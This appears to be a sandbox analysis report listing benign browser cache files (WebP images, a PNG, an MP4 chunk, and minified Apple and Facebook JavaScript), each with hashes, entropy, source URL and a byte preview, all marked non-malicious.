                                                                                                                                                                                                                                  SHA-512:07D75886E835C3B54B9D50F5C74B92D49F912A297285462D9A86F4DE597E72618B19FD3EAD8413583E94912615E5A6700DF79E0A877E967A6DE7DC98126CD070
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/Gn-j-s2UVmDu0R26ZITvvCfxG4loVrSMUBCfQc4gSjVst_0ui8nEL14azh2ipu4DoeU=s64-rw
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?...M(l......?.#"..I.]..{J.yONIu$.....]u.d.3~...H...s.K.cf..n..v....."..."".nw..@.$Cs...k.6......@.=...`.L....-...+.F...%..7..+_.....j.g..W.e.}[.......V..<;f?%...+...../.z.L..o..y5.j..."{c(h.F.....a....B&~.&O....m..W.>{_.m.).N....N.%P.V.n.w.m.6.GD\g5zx.m.-I..X..+.1"5aN8.))..R.k...O.;.w$.m...Jm......LU.$<.?.n)....6Z.9Ex...c....jO.3.$.db...m.m.8.m...s..Qf.{......gm......'"R..,Y...bff......s.f........ff...Ar.lY......7Z.9.m].m?.r.Sg../4.e.m.f./../..m...f.]IU...8.}."....n...Ba...+...F.%..y.....!.0 ...UsS.TTB0....H......).APe...H......Z.....BM+.f...@X.Ao..it...P.Xz....*. ......,}...Qn^.Y.*..B$.J.Xv,h%.,;Y......nkA..Qa.t....L:oi4.+.. ....A~.....UKa...@A`....59.ol.7...o...32.Pz....g..O..8.."......;.KT.^....n.e.......Rm.. )b...#...3SAJ.D$.$..B4.$..........}.i...........&.....:.8..KCm.[if..X.&#i.`..f. .p..u..5...@.......$....%(!...ue.~O./..a..N.v..j.QSP.F.".6...U.R..'.I:C@Z.$.....%(r........Z.`.........\B..B .jj..........9sz:EC[
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8886
                                                                                                                                                                                                                                  Entropy (8bit):7.9692303996476985
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:gcK0+C8Iz4uahama6DOvenUXiki7d5Pj6Vjzvb:EUcuQanKOGAi7TuVj3
                                                                                                                                                                                                                                  MD5:BE6F33B3D4BA91F81D1941268EA7E1C5
                                                                                                                                                                                                                                  SHA1:A62ADAACCE3E64A2B7E535D9FBF55041E715DF69
                                                                                                                                                                                                                                  SHA-256:7D8FDFA1F332C267F0E72B3A3FDC9E2FB184CF250F89D4AD38DFCD6A4B8A9905
                                                                                                                                                                                                                                  SHA-512:4ADDF3F035307E63A22607CF81739343350EE61195FE210AB8AF01B6173D59CDD73114DE54F72361C3B28688D2129F69F348144B05791785E527F7A32DD8D4E9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF."..WEBPVP8L."../?...M(l.....F.?.="...P.lU.p.1....J......0.,.G.m.|..?..4V...w.l$.6u..........O.W1.$.P..../.................V.s}...u..$.D.3p.\..$P.{e..0..I. ......d5........VT...{..3....Q.S...Xl..:+&q.3.kg...........;S....k....h4s.f..1..m..?.m?......1.h.FZ.$).,.H(Zf..=.;..3..tAg._c.vl.n.i.s......<&.8&.o).8.$I.d+n.Q..g.!...........uex.....I../^...,W.....=....y.m.6.9..,+...7.z....$i.m...y.#*..*P.mW.o.m.._...#;...+"._.y......$.../.s".e......m{.m...m....5;.i.....YH..yE.<...iT.D....+.1.jQ...]$)..p......2...$..iP...........91ElDH1.!J.b.a...(....$.).D.....zQ.E+V...;.+-....H...8I..;.D..u,@^'....*....... .@...(a.. E. .!p.I)bB.@.20.K^h.A....D....1:.]....T%#.F.`.EA.p..$I1F0B(.N.N1.DcI.H....C.$+..IP.<....#.)...dp.jHJ...zP6..)..r.z$U/BQ..un.r.B.59.....]..pLV.......8......'..*.........H.&.......2.|.....8.K....\.x.&X`WT.....N.R+.U..4..(....PX..&...# (...9I.W...j../..UQ+..n...'......R.Wic.Q1R....WS...Z....@.....<......xYR.K,T4Q...HT.19...i..]M.a....;r.fy...M
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):805933
                                                                                                                                                                                                                                  Entropy (8bit):5.389545949651775
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24576:n8rP4RAXuhh2O0NVIWaAPngBeM4zULaDnNfkt6:neP4RAwh2O0NVIWaAPngBeM4zULaDnNr
                                                                                                                                                                                                                                  MD5:FEDF0A7355DA0EC2FD483C6269EDE396
                                                                                                                                                                                                                                  SHA1:3C16C7280C72CC23FB3E457F819A247F19C2D70B
                                                                                                                                                                                                                                  SHA-256:D21C20E127D8A461CF2D71D3004C0A00D721AC2510A0C4D930F5E7394B251540
                                                                                                                                                                                                                                  SHA-512:BA3440DD37005534DC400E900A88732EF6A6E1D5435DC9DCE020A7FA909FAEA6A52BAA6F915E165975FCCA878B0F14C9823D53CD5EFD4870C2B93F8BF6AD62DF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://js-cdn.music.apple.com/hls.js/2.610.3/hls.js/hls.js
                                                                                                                                                                                                                                  Preview:/*! For license information please see hls.js.LICENSE.txt */.!function hy(py){const my=this;var e,t;e=this,t=function(){"use strict";var he,Q,K,e=e=>e&&e.Math===Math&&e,l=e("object"==typeof globalThis&&globalThis)||e("object"==typeof window&&window)||e("object"==typeof my&&my)||e("object"==typeof global&&global)||Function("return this")();class b extends Error{constructor(e,t,i,r,n,a){super(n),this.type=e,this.details=t,this.fatal=i,this.response=r,this.handled=!1,a&&(this.stack=a),n&&(this._message=n)}get message(){return this._message||(this._message=this.constructor.name+` code=`+this.response),this._message}}class pe extends b{constructor(e,t,i,r,n){super(e,t,i,r,n),this.response=r}}class d extends b{constructor(e,t){super(he.NETWORK_ERROR,Q.CERT_LOAD_ERROR,!1,e,t)}}const H={PlaylistNotReceived:-12884,CryptResponseReceivedSlowly:-16833,LivePlaylistUpdateError:-12888,NoResponseFromMediaRequest:-12889,IncompatibleAsset:-12927,CorruptStream:-16041,InternalError:-12645,CantSwitchInTime
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 1 x 1, 1-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):95
                                                                                                                                                                                                                                  Entropy (8bit):4.381705050636977
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:yionv//thPlE+kSI+Dtmy/Y+sR3sdsXxqtQAltjp:6v/lhPfkCDtmywFWsXxWVXjp
                                                                                                                                                                                                                                  MD5:39C11D656220EFD52F4965400D14900A
                                                                                                                                                                                                                                  SHA1:327050099CEE8D1AD81E7BFBE5CA2EA057780A87
                                                                                                                                                                                                                                  SHA-256:C0F9968D0FA5F4DEFF86BABCCD6DF52306138314607A6F3F0ACD2E7AFC783D1C
                                                                                                                                                                                                                                  SHA-512:B64595AD189620EA7A10715B0F84C30134CAA4BAB0F7FBA8E53438577BD33310939F2B4FACCC4D7152A3B279B641436E84211DB06FA9DB50FC0E9A1E83760B63
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............%.V.....PLTE....z=.....tRNS..31x....IDAT..c`........5.....IEND.B`.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):9038
                                                                                                                                                                                                                                  Entropy (8bit):7.954037396427113
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:g1uA4quq42sVtFzLqsPgdPFI2dWEhdHkiRT9B0Wgq39wIEgDSAwwO:g1f4Dq4xz1L5+FIchXl9Ba/87HO
                                                                                                                                                                                                                                  MD5:1452D115B4D97EE75BE7AB313689E25D
                                                                                                                                                                                                                                  SHA1:0D615B4718905D7DEE847A86DBFC2A6F75C3E3FB
                                                                                                                                                                                                                                  SHA-256:F63E7F21C2005AC04C09F72EF1587DC91C6B2261D1333311E5200ABB16010492
                                                                                                                                                                                                                                  SHA-512:958BC36E59C4426E47BDE9DC668C22B5891CD00FD3658B8B2691473FD4FE2D6B6A4B1E02F356F79B4BFC9A62C51AC0FC154E4FE5F0BFEE620BA4B8EBED7D3098
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/xlL2RGPKorMz9nqE1bio8ceqIRMlv9_X77ULaavTlx5NOU71SmqZTD6BYf4DYCxVBs8=s64-rw
                                                                                                                                                                                                                                  Preview:RIFFF#..WEBPVP8X........?..?..VP8L."../?...M(l...v...G$...|.7.L.q.V..1"......m#.w.....po>.....INz.p....|..zfV."IRT.{.b....33_.?..u.:..........$C.a..U.s.L.!..O.P..n.........v..Q........M.j......J..>.2.|..r.vY'.9.9.......k..../.....5...m..?....1..h.2.z.B........eLr......Na.........sWfff.lHb.%..a..$.V$9....D.....i.C....D..6.=03333..82".{..m.me........?.=..A.11U..d.F.ND#r.....m.x.....m.........#k....\I..t..g.c,.8..m...m...X^k<}...N'.....?..m.!...._D$K].k...o.k..m...m...=...WO.tu13#...p..G..9..}..aUR..m....}.....Y'.W.J..;.m....t...=...N..7X*z..}~."_.....Ccc...P...`.. &`..W0.h..!..|...t....B.&........O...(d.S..$.N.....\1.....C.H.....O......#..N.T..^..}._e..-.... .k,..P`.4...P. ..z....X.\..<.>\ _.....@.{8....{.U...q.!] .M.H..`.. D @..&.I...!........:C.d...o....\x..\...-...ZL...6(...`14....j6...P.1..(W.P...Qp.k.2.\..Y.SW)g`.@..B)....!....o.....0......3)M....s..aK3.Mma8....K.-nx...0....)..4.2PSp.........(...Z.35R.h*...n|.......
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):198604
                                                                                                                                                                                                                                  Entropy (8bit):7.991562366774542
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:6144:5dx+LXb242Jf1pb1BrXQrdMX3lZhCTxDKVq:Ym42Jf1p7aihwj
                                                                                                                                                                                                                                  MD5:CCB4128F1871BB6AA79F84420107C28D
                                                                                                                                                                                                                                  SHA1:C34DCCE326A2E7D205049DDB9F2F4B30DF0CAB2B
                                                                                                                                                                                                                                  SHA-256:066E40A4D44155DAFE9636BE361056E055472B777D7D5324894A1921A68D75AB
                                                                                                                                                                                                                                  SHA-512:982EBFAFCAE5B2F1E14C5D51D165336F913AE1F46A8CF492A59F0A140A719A64CFA3050839560BDF9AB4E327DA3DA6E91604EB6C14B219403166780E429474AF
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../..I.M@.d+l.{...../X8..".?...?w.{.*u..>...H...SM@............Ib...+.1p.y.S.E.W|.V....fN.Z....>.;.....I..:.._.\...K'..$O/M.QO}4_..I....."c..U5..w.....,5.....g<O.d.....'.g.W....;..7..'}b.$+...t..'.1;|...kiu.P....>...k%....!O..Y._.....YI>.G P.$....O.^...DGLT..j.e....;....*...bV..tf....V.W.V'..y?;.V....4O...A`..s&.%|...I.J|A......=w...V....Z..&.zy.;..-...O.X....#..z.k.@;'...J.{tvL...?..!L........9.0Q..z.ObU.P.1.i....J. .......@7.g...&1.}e.....>..0.Jf.n.0....s....8..._zVW.['.H.[N;.U.Z...........;0.@mN]..O[..d.c.<0.q...Y).R.....>....3a.Sw`.y...L..;.2.U......N.%..6..9...>'.....1.9..3A.*6....AAaL.g&hw....SUu...T...c.u..BI.$..p........AR.'p.EQ.A..u.....h..[DD)%v.~............RJ.b1M.4,...m{.H...!0.t..l.... ..AU]W.{...6.B(.?A.................N@.r..^....../..n........O.(.>.......&....;)....@..........&|......*E.d.%z..r..;.8...`.p4.....FB|B...hx@...$....H.d.....=qO.A.../X....mQ..ND..#.9.........y.:..n..f..h..A..F.z.nt..Cq...;... N.C....`%
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (11083)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):47925
                                                                                                                                                                                                                                  Entropy (8bit):5.63694271144091
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:+BtmzebYJGgouKpwSfsbfjgBdtcI1hDRm+YTgfLFLZBk/cNxnOjMNBHLys14WXLb:WLf/0wtcIvPL9Pk/cNBxLys14WXB5H
                                                                                                                                                                                                                                  MD5:A1E5572AB20DA021985F5FA17C38D4F3
                                                                                                                                                                                                                                  SHA1:45E35F3D5778133577DD5F8F75E7648A08363688
                                                                                                                                                                                                                                  SHA-256:71C88C8EB2871184AA06D114FCB5DD2DFB33D22611D48F15C5B2FCD427BD263C
                                                                                                                                                                                                                                  SHA-512:54A43382CACB11813F55A7DF4D8A01C5E35C3F3CE0E3C6FCF2466F667F44E40F62F5E3E38D2F37F7CCDF105A66A802C388F6CEA5B150E9DFE82B1672EC461AD6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iQbs4/yM/l/en_GB/5Tr2NIWNgxM.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("CometDensityAwarenessContext",["react"],(function(a,b,c,d,e,f,g){"use strict";var h;a=h||d("react");b=!1;c=a.createContext(b);g["default"]=c}),98);.__d("CometGroupsPathingFunnelLogger",[],(function(a,b,c,d,e,f){"use strict";function a(a){switch(a){case"1635855486666999":return"REACTION_MENU_LIKE";case"1678524932434102":return"REACTION_MENU_LOVE";case"478547315650144":return"REACTION_MENU_WOW";case"115940658764963":return"REACTION_MENU_HAHA";case"908563459236466":return"REACTION_MENU_SORRY";case"444813342392137":return"REACTION_MENU_ANGER";case"613557422527858":return"REACTION_MENU_SUPPORT";default:return void 0}}function b(a,b,c){return}function c(a){return}function d(a,b){return}function e(a,b,c){return}function g(a){return}f.getReactionQPLPointFromReaction=a;f.start=b;f.addPoint=c;f.addSharedPoint=d;f.addEventSharedPoint=e;f.endCancel=g}),66);.__d("CometImageFromIXValueRelayWrapper_sprite.graphql",[],(function(a,b,c,d,e,f){"use strict";a={argumentDefinitions:[
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 395x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32132
                                                                                                                                                                                                                                  Entropy (8bit):7.992096939239501
                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                  SSDEEP:768:Y7gwPOWsl2qLFs0fskF8jx6DDRaZOwuwHtp02FMPyUSUSv7U6NcAo9t:YpOWsS0EavwZHk26PPlI7LB0t
                                                                                                                                                                                                                                  MD5:151F38C4AB2D0B4D2974DDFFDCDCFE4D
                                                                                                                                                                                                                                  SHA1:CF3505BE735BCCBF393549909D16D7DCF136F91D
                                                                                                                                                                                                                                  SHA-256:522469DBA2E69F4E49E3A2CE317EAE101D1045AC391B73CED32A50B718F01D49
                                                                                                                                                                                                                                  SHA-512:ADA20B3637DFDFD96A944B0E83A8DF0677435345AB3BF70AEEBECE691475A616B981E83523D8C6C9A2A8FD501F911087ADED4E70AF2531C7CF12CC15CEF83BE1
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF|}..WEBPVP8 p}...q...*..(.>m*.E."!...@..5.........~..w..G.[.{._...._f...K..?...3............~......#...U..._.../..P...o.U.......-.#...;........^...=@?.{um.|{.G........!.w.?......9._c..z...._.?.~.~U}.........M.........{..?.o.>...}..?...o..._].{./..........m..........D.z.}.}.........?..P.....m......._...|..:...G..._.....}s...7.....G.G..."L.u..>...I..M}?*f...ko...........\y.....T..X.....K.........6g.........M.p.D...ty65.............4!....S...'.....n.XWbQ..px.bxPb87.......}..17....2.y^...(z89vV..g.]...K.,...&...\.,..x.|k.:@..?....k.....#.....z.~.2p?..A...)N.Y.pQr)......?....Z..!.@.b{p..7..,w]...|6......A.T..fc.T....1...w......u^c.m.,....Y&.S...$..}..e.c.......C1...w..K..Eu...94..0d.J...'c.0.).%..2yr..y=.l...J].x......^AQ..;...^..#..6`\...XT..f@<{..S....8.b<...N....j...yw..d.......&...-....K{.h5...@.d.*qo..K.M.dYZlhy.Qh.\."OV...l..V~.....................$+g..H.....,...../zi:....N.Q`.c.d-..z.G...q.V.q...k.......X..J.?(V"...k..0~H.4..v`..*mx.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):1048576
                                                                                                                                                                                                                                  Entropy (8bit):3.083754119145207
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:RvFmSGdywoyZz6erds5YMZt2GWLN4KvM75G1Wn:RvNk6waDZt23LN4EMFh
                                                                                                                                                                                                                                  MD5:90B353FC02BB585AB2E118BB67B2977F
                                                                                                                                                                                                                                  SHA1:40669F087259FE017A500A4DAE1112E52EB150D1
                                                                                                                                                                                                                                  SHA-256:CCBC2713D85A8CB7C19344371CF00701D7FB2C8318E53B61F06F35A7F82B82AE
                                                                                                                                                                                                                                  SHA-512:950386FDB4BAF382B29DF6141C111FB4DB14913E2EFDC48422300C0B07112341E40D9CA47A897A9DC7C940EB83F9DEE18EEA36AFA61E4EFD542D120537F6E811
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://apptrailers.itunes.apple.com/itunes-assets/PurpleVideo221/v4/8f/cb/4e/8fcb4e35-30df-c295-bbd9-4760d511ef3e/P875466468_Anull_video_gr265_sdr_886x1920-.mp4:2f81d129bf3797:4
                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11794
                                                                                                                                                                                                                                  Entropy (8bit):7.981205654531022
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:h0QcbTomyT/d9M2QYEcUc6GgVVYBOLMwHCG+1vm3cutU41HVHvEbN9Oslv0cE8Bu:h0smyzw2QPJGgz9V+5m3cwxzHcbNNlvw
                                                                                                                                                                                                                                  MD5:66E3AA84063184FE950C811E70715E7E
                                                                                                                                                                                                                                  SHA1:3E71B81A617DCBEF5939E1DABC487A8FF1F06996
                                                                                                                                                                                                                                  SHA-256:9E79717DE830CE55822C38DA925539643224A08C1B7C8F7B21F92CE0EA77DCEB
                                                                                                                                                                                                                                  SHA-512:642E18C209D4060D481E947B4FE3C8C5615EAAEA1F4EC98E82EDC8D4B488F07714A68FC617DAD453959A2D8D3C590FA170263C526FF2C1675EA2C5E105BF1944
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8X..............VP8 .-.......*....>.L.I$"(.)]...D.....>...#.z?._....4........s..././.v..}..^<.j.......r.....[......=j..~.............._z...........+....A}.....U.<.........>C.a.'./.?....J..v....B=..../.OL...".;....o............O...7.....>......u....|wp.....Z.'.Hj.Y..Q.-4!....r.....X.E..Z....t...[B^-q.R..7..{..Z.@.B..g+.K........w.Y^...V[...<...\....@_.".-..A.Y@^.-...m.`..%q....M2....{n..a.3....b..C....}..x\$?.3..8T..$b..z.!B......4.3..L.k.T..G..s>.3R.hA.P.V..G..\M...a.MI]a.,.....k.."............#.;............lc.../...._.,TW...a_...o..._...Z........[H.f.3...W..L..6..7.3. .T..o..XF.&.3..Z.a.t.b#...V..G...`l..nB.....=.b.>....!.m.;1QA..M}....\"8Od1..Z]...U."$m.~.;......%ue...\....C..*....1.$.O...W.Z..18..4...m;;..z..o]....qT.....)I.O..@H.@&..i.j.d.6..Rt*UW*e..`.e.......q2.(.r.k.*.hB.|X)*.z._......-.-...SHT....^\b..."....r ..ZU...x..Y..6..A.Y.......k.V.Q.k...a.V..H..gT...u..9....b.~.1..[8...M........)...R..QsV....m..y.[....@.{
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):686
                                                                                                                                                                                                                                  Entropy (8bit):7.598746043153558
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:3Wgb1D5zUWvKZPlpLC4U1KZmipXyg5iLUl9KQhoMQdHtLPhW7UdvnMoO6IBHhpW:3zDWlpu4U1KRL91mHAUdv70HW
                                                                                                                                                                                                                                  MD5:7B84B8DD3AF91F4EFB81F14311422377
                                                                                                                                                                                                                                  SHA1:ACDB0366714033A533A8E3F7C7C2518F8922C9F6
                                                                                                                                                                                                                                  SHA-256:3994FA5DC726B6D4449BDE23EF495775D259E7B6086161AC379AEE60B5887A14
                                                                                                                                                                                                                                  SHA-512:168C3BA1434E4FE56BF6E421C6F98A5C4645D2BF335586FEFC76E5A2547247A97F76C4F948C79B8DC2206E06EB2B68C4FD93ADE7E224121199C79ED83A049452
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF....WEBPVP8L..../?....%j..I.?..\qe...m.m..m..........E.......g.z..{..?z.8^.=s..q.&..G......0&...??.m.1gn.."2.....8..v..Wu.....H.W..,..%(..:.~Z..P....z..~O.h..u...F..X.0GB...3@..+...:...vb.5.R......-.+..S.....@.Xw.>."U..o..-.:.....j.i1...lI0p...8=....@.Xw...X.J2......&/..O..d.Y..v....x... 5.D5=J.....?..w.`O(q...`oE.B.##.}..d.s].O.j.d...5...y...3...]D...BY.7...b..FV..Uk...q\..>.X...t.j....+..D}ezP.cW..D>T3...+M...'TS.I...;..3I>.M.5.'DDf....`.......w......Wu..^4I.r.+z...T.{,m."l..d5......)._.....w..6..@.!s..7.%.$...MD....5.\....Jp..............t.b..k.........>-.7).~.....X..RP....7.b,k..Yh.I..-..l....Y...J-.Jl.U{I.[....(.{....h.BViYQ...3....
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9869)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10413
                                                                                                                                                                                                                                  Entropy (8bit):5.257533978847801
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:8nla2OCNzv/zCPfx1WY6Q8X4tYPNF9cxi3/lpemo+AW4mr+oaq5:8nl3OCRvbIfxkgUPRcxw/lpemoPW4mrb
                                                                                                                                                                                                                                  MD5:1B5686244F6C6516B3C0CB73B85DEB30
                                                                                                                                                                                                                                  SHA1:207E5F9CC6C80B1B84C18CDFA732A5C3CC43AE2B
                                                                                                                                                                                                                                  SHA-256:3A91FF301DBC45B9035E65C7CACB68C5C06105196AB82BDE6AD6970348F2D819
                                                                                                                                                                                                                                  SHA-512:73AC415260CAA2291E3F2A24393B226E1275A1981775E3AA4183B2ECC941872AEB3F1024756479FD56E26F3E27976607E576A835864892F547E17DA17A3B6A32
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*!. * IMPORTANT NOTE:. * . * This file is licensed only for the use of Apple developers in providing MusicKit Web Services,. * and is subject to the Apple Media Services Terms and Conditions and the Apple Developer Program. * License Agreement. You may not copy, modify, re-host, or create derivative works of this file or the. * accompanying Documentation, or any part thereof, including any updates, without Apple's written consent.. * . * ACKNOWLEDGEMENTS:. * https://js-cdn.music.apple.com/musickit/v1/acknowledgements.txt. */.import{d as e,N as a,w as i,p as t,b as o}from"./p-1ec6e574.js";import{g as l}from"./p-42d04e97.js";(()=>{const o=Array.from(e.querySelectorAll("script")).find((e=>new RegExp(`/${a}(\\.esm)?\\.js($|\\?|#)`).test(e.src)||e.getAttribute("data-stencil-namespace")===a)),l={};return"onbeforeload"in o&&!history.scrollRestoration?{then(){}}:(l.resourcesUrl=new URL(".",new URL(o.getAttribute("data-resources-url")||o.src,i.location.href)).href,t(l))})().then((e
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (10953)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):151566
                                                                                                                                                                                                                                  Entropy (8bit):5.39929251490803
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3072:JKzpzSVqQwMTqHD+yOGJLlViLRbrnCefvgYeMhroycP:JezSsfLlieP
                                                                                                                                                                                                                                  MD5:BC987911D4BED722BE159E8E4A955EE4
                                                                                                                                                                                                                                  SHA1:0637F70A3D1C00CDCDA780B9ACC21EA998E75AC7
                                                                                                                                                                                                                                  SHA-256:C31B9CE3C5C30304DD4F59649186764B75FED6F28059104C605A4F8FDC5CC2B5
                                                                                                                                                                                                                                  SHA-512:F7440F9E947479402466655BE6C26B11E0A39CE331B958EAE9BB65051ABEAC56407AA40EE29AF9B54F4725DECD8E82FCD1CB627D94641307446A541279CFABEA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3iMX84/yc/l/en_GB/JXFTcdEOgst.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("AdsBrowserExtensionErrorUtils",["isFalsey"],(function(a,b,c,d,e,f,g){"use strict";var h="chrome-extension://";function a(a){a=a.split(h);a=a[a.length-1];return a.split("/")[0]}function b(a){return!c("isFalsey")(a)&&a.indexOf(h)>-1}g.CHROME_EXTENSION=h;g.extractExtensionID=a;g.isBrowserExtensionError=b}),98);.__d("LaminarDebugger",["EventEmitter"],(function(a,b,c,d,e,f,g){"use strict";var h="DEBUGGER";a=function(){function a(){this.$1=[],this.$6={},this.$3=100,this.$2=new Array(this.$3),this.$4=new(c("EventEmitter"))(),this.$5=!1}var b=a.prototype;b.getDebuggerActionDispatchQueue=function(){return this.$2};b.addSnapshotToDebuggerActionDispatchQueue=function(a){this.$6=a.newState,this.$4.emit(h,a),this.$2.push(a),this.$2.shift()};b.updateCaptureRate=function(a){a>0&&(this.$2.length+=a-this.$3,this.$3=a)};b.addDebugListener=function(a){return this.$4.addListener(h,a)};b.removeAllDebugListeners=function(){this.$4.removeAllListeners(h)};b.getPauseActionDispatches=fun
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 166x296, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):10850
                                                                                                                                                                                                                                  Entropy (8bit):7.975671955265493
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xmG7orlt9U6+7/cWgN2ZPM/wMzJcRFxivdPDSr+Tazqt7s/sgHRKUjfAGAeseF0Y:sOwltaF/pgEZwNcxfrz8s0g8UjfAGZlR
                                                                                                                                                                                                                                  MD5:DF4F4BD424E27B3EEFF5DFF4D4B5A82A
                                                                                                                                                                                                                                  SHA1:00EDCBC57BE597D1431AA7388E91F2DA24DA141F
                                                                                                                                                                                                                                  SHA-256:E929EE6594A82B80C5463DCFD43E675919595DA8E52D097EC52CD709A8E80FFA
                                                                                                                                                                                                                                  SHA-512:8BB27E44C60312587C143E0F83F4CDB1DBCF8532E49408C03DCBA3D3C6DFC5EE4679B9E8F9E98C9876F3653450B9FC663AEB2E44B65031BC0F159236DD3147E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
